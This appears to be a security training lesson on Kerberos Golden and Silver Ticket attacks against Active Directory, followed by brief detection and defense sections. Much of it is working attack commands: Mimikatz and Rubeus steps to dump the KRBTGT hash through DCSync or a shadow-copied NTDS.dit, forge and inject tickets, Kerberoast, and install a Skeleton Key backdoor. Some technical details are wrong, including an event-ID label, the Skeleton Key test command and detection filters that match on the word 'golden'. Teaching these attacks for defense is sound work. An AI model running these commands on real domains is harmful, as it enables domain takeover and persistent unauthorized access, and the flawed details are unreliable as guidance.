๐Ÿ“š Learning Objectives

By the end of this lesson, you will be able to:

๐Ÿฅ‡ Golden Ticket Attack

What is a Golden Ticket?

A Golden Ticket is a forged Ticket Granting Ticket (TGT) that allows an attacker to impersonate any user in the domain. This attack requires compromising the KRBTGT account, which is used to encrypt all TGTs in the domain.

๐Ÿ”‘ Golden Ticket Key Characteristics:

  • Domain-wide Access: Can access any service in the domain
  • Arbitrary Privileges: Can impersonate any user or group
  • Persistent Access: Works even after password changes
  • Stealth Operation: Difficult to detect without proper monitoring

Golden Ticket Attack Process

1

๐Ÿ”“ KRBTGT Compromise

Obtain the KRBTGT account password hash

Methods:
  • DCSync attack (requires Domain Admin privileges)
  • NTDS.dit extraction and cracking
  • Memory dumping from Domain Controller
  • Volume Shadow Copy exploitation
2

๐ŸŽซ Ticket Generation

Create forged TGT with desired privileges

Required Information:
  • Domain SID
  • KRBTGT password hash
  • Target user account
  • Desired group memberships
3

๐Ÿš€ Ticket Usage

Use Golden Ticket for domain access

Capabilities:
  • Access any service in domain
  • Impersonate any user account
  • Maintain persistent access
  • Bypass most security controls

Golden Ticket Implementation

๐Ÿ”ง Using Mimikatz

Traditional Golden Ticket creation with Mimikatz

Command Syntax:
# Extract KRBTGT hash
lsadump::dcsync /domain:domain.com /user:krbtgt

# Create Golden Ticket
kerberos::golden /user:Administrator /domain:domain.com /sid:S-1-5-21-... /krbtgt:hash /ticket:golden.kirbi

# Use Golden Ticket
kerberos::ptt golden.kirbi
                            

โšก Using Rubeus

Modern C# implementation with Rubeus

Command Syntax:
# Create Golden Ticket
Rubeus.exe golden /rc4:krbtgt_hash /domain:domain.com /sid:S-1-5-21-... /user:Administrator /ticket:golden.kirbi

# Use Golden Ticket
Rubeus.exe ptt /ticket:golden.kirbi

# Create with custom groups
Rubeus.exe golden /rc4:krbtgt_hash /domain:domain.com /sid:S-1-5-21-... /user:Administrator /groups:512,513,518,519,520
                            

๐Ÿฅˆ Silver Ticket Attack

What is a Silver Ticket?

A Silver Ticket is a forged service ticket that allows direct access to a specific service without going through the Ticket Granting Service (TGS). This attack requires compromising the service account password.

๐Ÿ”‘ Silver Ticket Key Characteristics:

  • Service-specific: Only works for the targeted service
  • Direct Access: Bypasses TGS authentication
  • Limited Scope: Cannot access other services
  • Faster Execution: No TGS communication required

Silver Ticket Attack Process

1

๐ŸŽฏ Service Account Compromise

Obtain the service account password hash

Methods:
  • Kerberoasting attack
  • Password cracking
  • Memory dumping
  • Credential theft
2

๐ŸŽซ Service Ticket Creation

Generate forged service ticket for target service

Required Information:
  • Service account password hash
  • Service Principal Name (SPN)
  • Target service details
  • User account for impersonation
3

๐Ÿš€ Direct Service Access

Use Silver Ticket to access service directly

Capabilities:
  • Direct service authentication
  • Bypass TGS requirements
  • Impersonate user accounts
  • Access service resources

Silver Ticket Implementation

๐Ÿ”ง Using Mimikatz

Traditional Silver Ticket creation

Command Syntax:
# Create Silver Ticket for CIFS service
kerberos::golden /user:Administrator /domain:domain.com /sid:S-1-5-21-... /target:server01.domain.com /service:cifs /rc4:service_hash /ticket:silver.kirbi

# Create Silver Ticket for HTTP service
kerberos::golden /user:Administrator /domain:domain.com /sid:S-1-5-21-... /target:web01.domain.com /service:http /rc4:service_hash /ticket:silver.kirbi

# Use Silver Ticket
kerberos::ptt silver.kirbi
                            

โšก Using Rubeus

Modern Silver Ticket implementation

Command Syntax:
# Create Silver Ticket
Rubeus.exe silver /rc4:service_hash /domain:domain.com /sid:S-1-5-21-... /user:Administrator /service:cifs/server01.domain.com /ticket:silver.kirbi

# Use Silver Ticket
Rubeus.exe ptt /ticket:silver.kirbi

# Create for multiple services
Rubeus.exe silver /rc4:service_hash /domain:domain.com /sid:S-1-5-21-... /user:Administrator /service:cifs,ldap,http/server01.domain.com
                            

๐Ÿ”„ Advanced Persistence Techniques

Ticket-based Persistence

๐Ÿ”„ Ticket Renewal

Extending ticket validity for long-term access

Implementation:
  • Set extended ticket lifetime
  • Use ticket renewal mechanisms
  • Automate ticket refresh
  • Maintain continuous access
# Rubeus ticket renewal
Rubeus.exe renew /ticket:golden.kirbi

# Mimikatz ticket renewal
kerberos::purge
kerberos::golden /user:Administrator /domain:domain.com /sid:S-1-5-21-... /krbtgt:hash /ticket:renewed.kirbi
                            

๐ŸŽญ User Impersonation

Creating tickets for specific user accounts

Implementation:
  • Target high-privilege accounts
  • Include multiple group memberships
  • Set appropriate ticket flags
  • Maintain stealth operations
# Create ticket for specific user with custom groups
Rubeus.exe golden /rc4:krbtgt_hash /domain:domain.com /sid:S-1-5-21-... /user:target_user /groups:512,513,518,519,520 /ticket:custom.kirbi
                            

๐Ÿ”„ Skeleton Key

Installing backdoor authentication mechanism

Implementation:
  • Patch LSASS with skeleton key
  • Set universal password
  • Maintain normal authentication
  • Enable backdoor access
# Mimikatz skeleton key
privilege::debug
misc::skeleton

# Test skeleton key
lsadump::dcsync /domain:domain.com /user:Administrator /password:mimikatz
                            

๐Ÿ” Detection and Analysis

Ticket Attack Indicators

๐Ÿ“Š Event Log Analysis

Windows Event Log indicators of ticket attacks

Key Events:
  • Event ID 4624 - Successful logon with unusual source
  • Event ID 4768 - TGS ticket requested
  • Event ID 4769 - Service ticket requested
  • Event ID 4771 - Kerberos pre-authentication failed

๐Ÿ” Network Traffic Analysis

Network-based detection of ticket attacks

Traffic Patterns:
  • Unusual Kerberos traffic patterns
  • Direct service access without TGS
  • Multiple failed authentication attempts
  • Anomalous ticket lifetimes

๐ŸŽฏ Behavioral Analysis

User and system behavior indicators

Behavioral Signs:
  • Privilege escalation patterns
  • Unusual service access
  • Lateral movement indicators
  • Persistence mechanism deployment

Detection Tools and Techniques

๐Ÿ›ก๏ธ Microsoft Security Tools

  • Windows Defender ATP: Advanced threat protection
  • Azure Sentinel: SIEM and security analytics
  • Advanced Threat Analytics: Behavioral analysis
  • Security and Compliance Center: Unified security management

๐Ÿ” Third-party Solutions

  • Splunk: Security information and event management
  • QRadar: Security intelligence platform
  • Carbon Black: Endpoint detection and response
  • CrowdStrike: Cloud-native security platform

๐Ÿ›ก๏ธ Defense Strategies

Prevention and Mitigation

๐Ÿ” KRBTGT Security

Implementation:
  • Regular KRBTGT password rotation
  • Strong password policies
  • Monitoring KRBTGT access
  • Restricted administrative access
  • Regular security assessments

๐ŸŽซ Ticket Security

Implementation:
  • Short ticket lifetimes
  • Ticket renewal restrictions
  • Anomalous ticket detection
  • Service account hardening
  • Regular ticket monitoring

๐Ÿ“Š Monitoring & Detection

Implementation:
  • Comprehensive event logging
  • Real-time alerting systems
  • Behavioral analysis tools
  • Network traffic monitoring
  • SIEM integration

๐Ÿ”ง Configuration Hardening

Implementation:
  • Secure service account management
  • Privilege escalation controls
  • Network segmentation
  • Access control restrictions
  • Regular security updates

๐Ÿงช Hands-On Exercise

Exercise: Golden and Silver Ticket Attack Simulation

Objective: Simulate Golden and Silver ticket attacks in a controlled environment and implement detection mechanisms.

๐Ÿ“‹ Steps:

  1. Environment Setup

    Prepare the attack environment:

    # Verify domain controller access
    klist
    
    # Check current tickets
    Rubeus.exe klist
    
    # Verify domain information
    whoami /all
                                
  2. KRBTGT Hash Extraction

    Extract KRBTGT account hash:

    # Using DCSync (requires Domain Admin)
    lsadump::dcsync /domain:domain.com /user:krbtgt
    
    # Alternative: Volume Shadow Copy
    vssadmin list shadows
    vssadmin create shadow /for=C:
    copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\ntds.dit
                                
  3. Golden Ticket Creation

    Create and use Golden Ticket:

    # Create Golden Ticket
    Rubeus.exe golden /rc4:krbtgt_hash /domain:domain.com /sid:S-1-5-21-... /user:Administrator /ticket:golden.kirbi
    
    # Use Golden Ticket
    Rubeus.exe ptt /ticket:golden.kirbi
    
    # Verify ticket usage
    Rubeus.exe klist
    dir \\server01.domain.com\C$
                                
  4. Silver Ticket Creation

    Create and use Silver Ticket:

    # Get service account hash (from Kerberoasting)
    Rubeus.exe kerberoast /user:sqlservice /ticket:service.kirbi
    
    # Create Silver Ticket
    Rubeus.exe silver /rc4:service_hash /domain:domain.com /sid:S-1-5-21-... /user:Administrator /service:cifs/server01.domain.com
    
    # Use Silver Ticket
    Rubeus.exe ptt /ticket:silver.kirbi
                                
  5. Detection Implementation

    Implement detection mechanisms:

    # Monitor Kerberos events
    Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4768} | Where-Object {$_.Message -like "*golden*"}
    
    # Check for anomalous ticket lifetimes
    Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4768} | Where-Object {$_.Message -like "*lifetime*"}
                                

๐Ÿ“„ Deliverables:

  • Golden Ticket attack demonstration
  • Silver Ticket attack demonstration
  • Detection mechanism implementation
  • Security recommendations report

๐Ÿ“Š Knowledge Check

Question 1: What account is required to create a Golden Ticket?

Question 2: What is the main difference between Golden and Silver tickets?

Question 3: Which tool is commonly used for Golden Ticket attacks?

๐Ÿ“ง Stay Updated with New Lessons

Get notified when we add new advanced lessons and expert content!